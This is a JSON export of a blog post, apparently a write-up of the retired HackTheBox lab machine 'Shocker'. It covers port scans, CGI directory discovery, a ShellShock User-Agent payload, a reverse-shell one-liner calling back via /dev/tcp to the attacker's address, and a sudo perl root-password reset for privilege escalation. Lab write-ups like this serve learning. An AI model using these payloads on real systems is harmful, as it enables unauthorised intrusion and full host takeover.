{"id":93,"date":"2024-11-13T09:05:58","date_gmt":"2024-11-13T01:05:58","guid":{"rendered":"https:\/\/www.misaka19008-lab.icu\/?p=93"},"modified":"2024-11-13T09:52:18","modified_gmt":"2024-11-13T01:52:18","slug":"htb_machine_shocker","status":"publish","type":"post","link":"https:\/\/www.misaka19008-lab.icu\/index.php\/2024\/11\/13\/htb_machine_shocker\/","title":{"rendered":"HTB Machine Shocker Penetration Test Notes"},"content":{"rendered":"<hr \/>\n<h1>Target Information<\/h1>\n<blockquote><p><strong>IP address:<\/strong> <code>10.10.10.56<\/code><\/p><\/blockquote>\n<hr \/>\n<h1>Information Gathering<\/h1>\n<h2>ICMP Check<\/h2>\n<pre><code class=\"language-plain\">\u250c\u2500\u2500(root\u327fattacker)-[\/home\/\u2026\/Documents\/vulnhub_notes\/shocker\/nmap_reports]\n\u2514\u2500# ping -c 4 10.10.10.56\nPING 10.10.10.56 (10.10.10.56) 56(84) bytes of data.\n\n--- 10.10.10.56 ping statistics ---\n4 packets transmitted, 0 received, 100% packet loss, time 3078ms<\/code><\/pre>\n<p>No <code>ICMP<\/code> communication is possible between the attacking machine and the target.<\/p>\n<h2>Firewall Check<\/h2>\n<pre><code class=\"language-plain\"># Nmap 7.94SVN scan initiated Tue Jun  4 21:27:26 2024 as: nmap -sA -p- -Pn --min-rate 1000 -oN .\/ack_result.txt 10.10.10.56\nNmap scan report for 10.10.10.56 (10.10.10.56)\nHost is up.\nAll 65535 scanned ports on 10.10.10.56 (10.10.10.56) are in ignored states.\nNot shown: 65535 filtered tcp ports (no-response)\n\n# Nmap done at Tue Jun  4 21:29:39 2024 -- 1 IP address (1 host up) scanned in 132.81 seconds<\/code><\/pre>\n<p>All 65535 <code>TCP<\/code> ports come back filtered (no response); the target reveals no open <code>TCP<\/code> ports to this ACK scan.<\/p>\n<h2>Network Port Scan<\/h2>\n<p><code>TCP<\/code><strong> port scan results<\/strong><\/p>\n<pre><code class=\"language-plain\"># Nmap 7.94SVN scan initiated Tue Jun  4 22:00:36 2024 as: nmap -sT -sV -A -p- --min-rate 2000 -oN .\/tcp_result.txt 10.10.10.56\n
Nmap scan report for 10.10.10.56 (10.10.10.56)\nHost is up (0.24s latency).\nNot shown: 65531 closed tcp ports (conn-refused)\nPORT      STATE    SERVICE VERSION\n80\/tcp    open     http    Apache httpd 2.4.18 ((Ubuntu))\n|_http-server-header: Apache\/2.4.18 (Ubuntu)\n|_http-title: Site doesn't have a title (text\/html).\n2222\/tcp  open     ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)\n|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)\n|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)\n10276\/tcp filtered unknown\n15743\/tcp filtered unknown\nNo exact OS matches for host (If you know what OS is running on it, see https:\/\/nmap.org\/submit\/ ).\nTCP\/IP fingerprint:\n
OS:SCAN(V=7.94SVN%E=4%D=6\/4%OT=80%CT=1%CU=35638%PV=Y%DS=2%DC=T%G=Y%TM=665F1\nOS:E55%P=x86_64-pc-linux-gnu)SEQ(SP=100%GCD=1%ISR=10D%TI=Z%CI=I%TS=A)SEQ(SP\nOS:=105%GCD=1%ISR=108%TI=Z%II=I%TS=8)SEQ(SP=FD%GCD=1%ISR=10E%TI=Z%II=I%TS=8\nOS:)SEQ(SP=FD%GCD=1%ISR=10E%TI=Z%CI=I%II=I%TS=A)SEQ(SP=FE%GCD=1%ISR=10E%TI=\nOS:Z%CI=I%II=I%TS=A)OPS(O1=M53CST11NW6%O2=M53CST11NW6%O3=M53CNNT11NW6%O4=M5\nOS:3CST11NW6%O5=M53CST11NW6%O6=M53CST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120\nOS:%W5=7120%W6=7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M53CNNSNW6%CC=Y%Q=)T1(R=Y%DF\nOS:=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z\nOS:%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=\nOS:Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%\nOS:RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)\nOS:IE(R=Y%DFI=N%T=40%CD=S)\n\nNetwork Distance: 2 hops\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n\nTRACEROUTE (using proto 1\/icmp)\nHOP RTT       ADDRESS\n1   234.91 ms 10.10.14.1 (10.10.14.1)\n2   235.02 ms 10.10.10.56 (10.10.10.56)\n\nOS and Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\n# Nmap done at Tue Jun  4 22:01:57 2024 -- 1 IP address (1 host up) scanned in 80.64 seconds<\/code><\/pre>\n
<p><code>UDP<\/code><strong> open port list scan results<\/strong><\/p>\n<pre><code class=\"language-plain\"># Nmap 7.94SVN scan initiated Tue Jun  4 21:44:09 2024 as: nmap -sU -p- -Pn --min-rate 2000 -oN .\/udp_ports.txt 10.10.10.56\nNmap scan report for 10.10.10.56 (10.10.10.56)\nHost is up.\nAll 65535 scanned ports on 10.10.10.56 (10.10.10.56) are in ignored states.\nNot shown: 65535 open|filtered udp ports (no-response)\n\n# Nmap done at Tue Jun  4 21:45:16 2024 -- 1 IP address (1 host up) scanned in 67.17 seconds<\/code><\/pre>\n<p><code>UDP<\/code><strong> port detail scan results<\/strong><\/p>\n<pre><code class=\"language-plain\">(none)<\/code><\/pre>\n<p><strong>The target operating system is identified as <\/strong><code>Ubuntu Linux<\/code><strong>; a port-knocking service on the target is also suspected.<\/strong><\/p>\n<hr \/>\n<h1>Service Probing<\/h1>\n<h2>SSH Service (port 2222)<\/h2>\n<p>Port <code>Banner<\/code>:<\/p>\n<pre><code class=\"language-plain\">\u250c\u2500\u2500(root\u327fattacker)-[\/home\/hacker]\n\u2514\u2500# nc -nv 10.10.10.56 2222\n(UNKNOWN) [10.10.10.56] 2222 (?) open\nSSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.2<\/code><\/pre>\n
<h2>Web Application (port 80)<\/h2>\n<p>Open the home page: <code>http:\/\/10.10.10.56\/<\/code><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/jpeg\/42816956\/1717756142246-0a9e763d-10e0-4799-8c7b-38af52cda80a.jpeg\" alt=\"\" \/><\/p>\n<p>The page source is as follows:<\/p>\n<pre><code class=\"language-html\">&lt;!DOCTYPE html&gt;\n&lt;html&gt;\n&lt;body&gt;\n\n&lt;h2&gt;Don't Bug Me!&lt;\/h2&gt;\n&lt;img src=\"bug.jpg\" alt=\"bug\" style=\"width:450px;height:350px;\"&gt;\n\n&lt;\/body&gt;\n&lt;\/html&gt;<\/code><\/pre>\n<p>Downloading <code>bug.jpg<\/code> for local analysis turned up nothing of note.<\/p>\n<p>Scan directories directly (dictionary enumeration with <code>directory-list-2.3-small.txt<\/code>; the <code>--add-slash<\/code> option appends a trailing slash to each path):<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/jpeg\/42816956\/1717761321346-13bcd24e-2228-4575-8a88-6289b9b84900.jpeg\" alt=\"\" \/><\/p>\n<p>Two directories, <code>\/cgi-bin\/<\/code> and <code>\/icons\/<\/code>, are found. A <code>ShellShock<\/code> vulnerability is suspected.<\/p>\n<p>Try enumerating the <code>\/cgi-bin\/<\/code> directory:<\/p>\n<pre><code class=\"language-plain\"># Dirsearch started Fri Jun  7 20:03:38 2024 as: \/usr\/lib\/python3\/dist-packages\/dirsearch\/dirsearch.py -u http:\/\/10.10.10.56\/cgi-bin\/ -x 400,403,404 -t 60 -e cgi,sh\n\n200   118B   http:\/\/10.10.10.56\/cgi-bin\/user.sh<\/code><\/pre>\n<p>The script file <code>user.sh<\/code> is found. After downloading it, its content is as follows:<\/p>\n<pre><code class=\"language-plain\">Content-Type: text\/plain\n\nJust an uptime test script\n\n 07:59:29 up  1:39,  0 users,  load average: 0.00, 0.00, 0.00\n<\/code><\/pre>\n
<p>This <code>CGI<\/code> script evidently runs the <code>uptime<\/code> command.<\/p>\n<hr \/>\n<h1>Exploitation<\/h1>\n<p>Try attacking this <code>CGI<\/code> program through the <code>ShellShock<\/code> vulnerability:<\/p>\n<pre><code class=\"language-bash\"># Change the contents of HTTP User-Agent to this: \n() { :; }; echo ; \/usr\/bin\/id<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/jpeg\/42816956\/1717762370810-e318e76d-7324-48aa-a9ad-6a9e66e0851b.jpeg\" alt=\"\" \/><\/p>\n<p><strong>The <\/strong><code>ShellShock<\/code><strong> vulnerability is confirmed!<\/strong> Get a reverse shell directly:<\/p>\n<pre><code class=\"language-bash\">() { :; }; echo ; \/bin\/bash -c 'bash -i &gt;&amp; \/dev\/tcp\/10.10.14.12\/443 0&gt;&amp;1'<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/jpeg\/42816956\/1717762718262-d61661a9-9693-44f9-8040-4e0277f2145f.jpeg\" alt=\"\" \/><\/p>\n<p><strong>Success!!!<\/strong><\/p>\n<hr \/>\n<h1>Privilege Escalation<\/h1>\n<h2>Sudo Perl Privilege Escalation<\/h2>\n<p>Use <code>sudo -l<\/code> to check the current user's privileges:<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/jpeg\/42816956\/1717763346463-7931450d-eb3c-42fd-ae6f-27d4ab2f39b7.jpeg\" alt=\"\" \/><\/p>\n<p>Escalate privileges directly with the following command (it changes the <code>root<\/code> password; afterwards switch to <code>root<\/code> with <code>su -<\/code>):<\/p>\n<pre><code class=\"language-bash\">sudo perl -e 'exec \"passwd root\";'<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/jpeg\/42816956\/1717763528374-fae7730c-2d5e-4aaf-8c3e-4e8646e41c20.jpeg\" alt=\"\" \/><\/p>\n<p><strong>Privilege escalation successful!!!<\/strong><\/p>\n<hr \/>\n<h1>Flag File<\/h1>\n<pre><code class=\"language-plain\">2b8dbe47f884402243dbc2b65f4818d1<\/code><\/pre>\n<hr \/>\n<h1>This concludes the penetration test of this machine<\/h1>\n<hr \/>\n","protected":false},"excerpt":{"rendered":"<p>Target Information IP address: 10.10.10.56 Information Gathering ICMP Check \u250c\u2500\u2500(root\u327fattacker)-[\/home\/\u2026\/Doc &#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_seopress_robots_primary_cat":"","_seopress_titles_title":"","_seopress_titles_desc":"","_seopress_robots_index":"","emotion":"","emotion_color":"","title_style":"","license":"","footnotes":""},"categories":[3,14],"tags":[],"class_list":["post-93","post","type-post","status-publish","format-standard","hentry","category-htb_retired","category-linux_machines"],"_links":{"self":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/93","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/comments?post=93"}],"version-history":[{"count":2,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/93\/revisions"}],"predecessor-version":[{"id":95,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/93\/revisions\/95"}],"wp:attachme
nt":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/media?parent=93"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/categories?post=93"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/tags?post=93"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}